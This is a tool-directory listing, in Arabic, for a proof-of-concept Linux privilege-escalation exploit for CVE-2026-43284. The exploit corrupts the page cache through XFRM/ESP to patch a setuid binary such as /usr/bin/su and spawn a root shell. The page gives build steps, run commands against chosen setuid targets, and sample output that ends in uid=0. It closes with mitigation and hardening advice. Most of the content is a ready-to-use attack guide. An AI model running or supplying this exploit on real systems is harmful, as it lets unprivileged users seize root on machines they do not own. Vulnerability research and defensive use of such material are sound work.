Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-43284-DirtyFrag-PoC — إثبات المفهوم لـ CVE-2026-43284 — بدائية كتابة بحجم 4 بايت في ذاكرة التخزين المؤقت للصفحات عبر XFRM/ESP لتعديل ثنائي setuid (x86_64، مساحات أسماء المستخدمين). يشمل فحصًا مسبقًا للنواة وفحص SUID. | Kitploit
أدوات/GitHubGitHub/jayhutajulu1/cve-2026-43284-dirtyfrag-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHubjayhutajulu1/cve-2026-43284-dirtyfrag-poc

CVE-2026-43284-DirtyFrag-PoC

إثبات المفهوم لـ CVE-2026-43284 — بدائية كتابة بحجم 4 بايت في ذاكرة التخزين المؤقت للصفحات عبر XFRM/ESP لتعديل ثنائي setuid (x86_64، مساحات أسماء المستخدمين). يشمل فحصًا مسبقًا للنواة وفحص SUID.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
111منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-43284 — XFRM/ESP بأربعة بايتات

CVE Platform Type Status

إثبات المفهوم لتصعيد صلاحيات محلي عبر إتلاف ذاكرة التخزين المؤقت للصفحات في XFRM/ESP
أولية كتابة بأربعة بايتات · 48 تكرارًا · استبدال ELF بحجم 192 بايتًا · مستخدم غير مميز + netns


إثبات المفهوم

فحوصات ما قبل التشغيل ومراحل الاستغلال على WSL2 Ubuntu 24.04 قشرة جذر ناجحة مع التحقق من uid=0

يسار: فحص النواة المسبق، وفحص setuid، وسلسلة الاستغلال  ·  يمين: تم إطلاق قشرة جذر — id / whoami تؤكدان uid=0(root)
تم الاختبار على WSL2 · Ubuntu 24.04.1 LTS · النواة 6.6.87.2-microsoft-standard-WSL2


  ╔═══════════════════════════════════════╗
  ║  SLEY - CVE-2026-43284 dirtyfrag PoC  ║
  ╚═══════════════════════════════════════╝

إخلاء مسؤولية: لأغراض البحث الأمني المصرح به والتعليم والاختبار على الأنظمة التي تمتلكها أو لديك إذن صريح لاختبارها فقط. المؤلفون غير مسؤولين عن إساءة الاستخدام.


نظرة عامة

CVECVE-2026-43284
النوعتصعيد صلاحيات محلي (LPE)
المتجهإتلاف ذاكرة التخزين المؤقت للصفحات عبر XFRM / ESP-UDP (UDP_ENCAP_ESPINUDP)
الأولية4 بايتات لكل تكرار (ESN seq_hi)
الحمولةELF بحجم 192 بايتًا لمعمارية x86_64 (setuid(0) + setgid(0) + execve("/bin/sh"))
الهدف الافتراضي/usr/bin/su
البنيةx86_64 فقط
الصلاحيات المطلوبةمستخدم غير مميز (يستخدم مساحات أسماء المستخدم والشبكة)

يعمل حتى عند وضع algif_aead في القائمة السوداء — يستخدم الاستغلال مسار كود XFRM/ESP في النواة مباشرة.


الميزات

فحوصات ما قبل التشغيل مدمجة قبل الاستغلال:

  1. إعدادات النواة — يتحقق من CONFIG_USER_NS، وCONFIG_XFRM، وCONFIG_INET_ESP
    (يقرأ /boot/config-* أو /lib/modules/*/config أو /proc/config.gz على WSL2)
  2. فحص setuid — يسرد ثنائيات SUID على النظام (find / -perm -4000)
  3. الاستغلال — يرقع ذاكرة التخزين المؤقت للصفحات، ويطلق قشرة جذر عبر PTY، ويستعيد الهدف عند الخروج

المتطلبات

خيارات النواة

CONFIG_USER_NS=y
CONFIG_XFRM=y
CONFIG_INET_ESP=m   # or =y

فحص سريع:

# bare metal / VM
grep -E 'CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=' /boot/config-$(uname -r)

# WSL2
zcat /proc/config.gz | grep -E 'CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS='

أخرى

  • نواة لينكس قابلة للاستغلال بـ CVE-2026-43284 (انظر حالة التصحيح)
  • gcc، وlibc، وlibutil (لـ forkpty)
  • ثنائي هدف setuid قابل للقراءة (الافتراضي: /usr/bin/su)

البناء

git clone https://github.com/jayhutajulu1/CVE-2026-43284.git
cd CVE-2026-43284
make

أو يدويًا:

gcc -O0 -Wall -o sley-dirtyfrag sley-dirtyfrag.c -lutil

-O0 مقصود — لأن التحسين قد يكسر سلوك splice/UDP الحساس للتوقيت.


الاستخدام

1. تأكد من أنك غير مميز

id
# uid=1000(youruser) gid=1000(youruser) groups=...

2. شغّل الاستغلال

./sley-dirtyfrag                  # default target: /usr/bin/su
./sley-dirtyfrag /usr/bin/passwd  # custom setuid binary

تشغّل الأداة ثلاث مراحل آلية:

المرحلةالوظيفة
1فحص مسبق لإعدادات النواة (CONFIG_USER_NS, CONFIG_XFRM, CONFIG_INET_ESP)
2فحص شامل لثنائيات setuid على النظام؛ يسلط الضوء على الهدف الافتراضي
3نسخ الهدف احتياطيًا ← ترقيع ذاكرة التخزين المؤقت للصفحات (48× كتابة بأربعة بايتات) ← إطلاق قشرة جذر

3. تحقق من صلاحيات الجذر

داخل القشرة التي تم إطلاقها:

id
# uid=0(root) gid=0(root) groups=0(root)

whoami
# root

4. اخرج للاستعادة

اضغط Ctrl+D أو اكتب exit. يُسقط الـ PoC ذاكرة التخزين المؤقت للصفحات بحيث تتم استعادة الثنائي الأصلي الموجود على القرص تلقائيًا.

إذا فشلت الاستعادة:

echo 3 | sudo tee /proc/sys/vm/drop_caches

مرجع الأوامر

الأمرالوصف
./sley-dirtyfragاستغلال /usr/bin/su (الافتراضي)
./sley-dirtyfrag /path/to/suidاستغلال ثنائي setuid مخصص
makeبناء sley-dirtyfrag
make cleanإزالة الثنائي

مثال على المخرجات

┌─[ phase 1] kernel config preflight
  → /proc/config.gz
  [+] CONFIG_USER_NS        = y  (required =y)
  [+] CONFIG_XFRM           = y  (required =y)
  [+] CONFIG_INET_ESP       = m  (required =m or =y)
  kernel options OK.

┌─[ phase 2] setuid binary scan
  10 /usr/bin/su  ← target
  found 14 setuid binaries.

┌─[ phase 3] exploit
  [*] unshare userns+netns, register 48 XFRM SA, splice→UDP 4500...
  [+] corrupt               all iterations done
  [+] verify                ELF patch detected

  ╔══════════════════════════════════════╗
  ║  root shell — exit to restore        ║
  ╚══════════════════════════════════════╝

التخفيف

طبّق تصحيح النواة (موصى به)

أُصلح فيf4c50a4034e6 (النسخة الرئيسية، 8 مايو 2026)
أُدخل فيcac2661c53f3 (يناير 2017)

الإجراء: قم بترقية نواة التوزيعة إلى نسخة تتضمن الإصلاح، أو ابنِ من شجرة رئيسية مرقّعة.

# check your running kernel
uname -r

# verify fix is present (example — adjust for your distro's package naming)
# apt update && apt install --only-upgrade linux-image-$(uname -r)

خيارات التحصين (دفاع متعمق)

الإجراءالتأثير
تصحيح / ترقية النواةيزيل خلل الكتابة الأساسي في ذاكرة التخزين المؤقت للصفحات
تقييد مساحات أسماء المستخدمينيحجب هذا الـ PoC (يتطلب CONFIG_USER_NS)
إزالة الثنائيات setuid غير الضروريةيقلل الأهداف القابلة للاستغلال (chmod u-s، أو إلغاء التثبيت)
Lockdown / LSM (SELinux, AppArmor)قد يحد من تأثير ما بعد الاستغلال اعتمادًا على السياسة
مراقبة XFRM + UDP/4500كشف تسجيل SA الشاذ وحركة ESP-in-UDP من مساحات أسماء غير مميزة

تقييد مساحات أسماء المستخدمين غير المميزين

يعتمد هذا الاستغلال على unshare(CLONE_NEWUSER | CLONE_NEWNET) بدون صلاحيات الجذر.

# runtime (may not exist on all kernels)
sysctl kernel.unprivileged_userns_clone=0

# or disable at build time
# CONFIG_USER_NS is not set

ملاحظة: تعطيل مساحات أسماء المستخدمين يحجب هذا الـ PoC ولكن ليس بالضرورة CVE-2026-43500 (نسخة rxrpc للأنظمة التي لا تحتوي على userns).

تدقيق ثنائيات setuid

find / -perm -4000 -type f 2>/dev/null
# remove or harden binaries you do not need

إسقاط ذاكرة التخزين المؤقت بعد الاشتباه في اختراق

إذا كنت تعتقد أن ثنائي setuid تم ترقيعه في الذاكرة:

echo 3 | sudo tee /proc/sys/vm/drop_caches
# re-verify binary integrity from package manager / known-good hash

كيف يعمل

تنزيل الأداة